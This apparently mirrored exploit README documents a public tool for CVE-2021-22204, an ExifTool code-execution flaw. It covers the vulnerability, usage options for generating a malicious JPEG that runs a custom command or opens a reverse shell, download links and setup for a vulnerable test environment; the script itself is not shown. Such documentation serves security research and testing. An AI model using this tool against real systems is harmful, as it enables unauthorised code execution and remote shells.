## https://sploitus.com/exploit?id=D1EFC5A3-3F5B-5A00-9A45-80777934AC77
# Exploit for CVE-2021-22204 (ExifTool) - Arbitrary Code Execution
![GitHub CVE Cover](https://user-images.githubusercontent.com/23003787/172497711-958a0fb3-3937-41f7-be11-3c9fd767203d.png)
**Like this repo? Give us a โญ!**
*For educational and authorized security research purposes only.*
## Exploit Author
[@UNICORDev](https://unicord.dev) by ([@NicPWNs](https://github.com/NicPWNs) and [@Dev-Yeoj](https://github.com/Dev-Yeoj))
## Vulnerability Description
Improper neutralization of user data in the DjVu file format in ExifTool versions 7.44 and up allows arbitrary code execution when parsing the malicious image.
## Exploit Description
Use this exploit to generate a JPEG image payload that can be used with a vulnerable ExifTool version for code execution. A custom command can be provided or a reverse shell can be generated. A JPEG image is automatically generated, and optionally, a custom JPEG image can be supplied to have the payload inserted.
## Usage
```bash
python3 exploit-CVE-2021-22204.py -c <command>
python3 exploit-CVE-2021-22204.py -s <local-IP> <local-port>
python3 exploit-CVE-2021-22204.py -c <command> [-i <image.jpg>]
python3 exploit-CVE-2021-22204.py -s <local-IP> <local-port> [-i <image.jpg>]
python3 exploit-CVE-2021-22204.py -h
```
## Options
```bash
-c Custom command mode. Provide command to execute.
-s Reverse shell mode. Provide local IP and port.
-i Path to custom JPEG image. (Optional)
-h Show this help menu.
```
## Download
[Download exploit-CVE-2021-22204.py from GitHub](https://raw.githubusercontent.com/UNICORDev/exploit-CVE-2021-22204/main/exploit-CVE-2021-22204.py)
[Download exploit-CVE-2021-22204.py from ExploitDB](https://www.exploit-db.com/exploits/50911)
### Searchsploit (ExploitDB)
```bash
searchsploit -u
searchsploit -m 50911
```
## Exploit Requirements
- python3
- djvulibre-bin
- exiftool
## Demo
![Demo Gif](https://user-images.githubusercontent.com/23003787/168875285-b939e4a6-ea10-4b0d-a11a-3a2c1adc0fd7.gif)
## Tested On
Exiftool Version 12.23
## Applies To
Exiftool Versions 7.44 - 12.23
## Vulnerable Environment
```bash
wget https://github.com/exiftool/exiftool/archive/refs/tags/12.23.zip
unzip exiftool-12.23.zip
cd exiftool-12.23
perl Makefile.PL
make test
sudo make install
exiftool -ver
```
## Test Generated Payload
```bash
exiftool image.jpg
```
## Credits
- https://hackerone.com/reports/1154542
- https://blog.convisoappsec.com/en/a-case-study-on-cve-2021-22204-exiftool-rce/
- https://nvd.nist.gov/vuln/detail/CVE-2021-22204
- https://app.hackthebox.com/machines/Overflow
- https://www.exploit-db.com/exploits/50911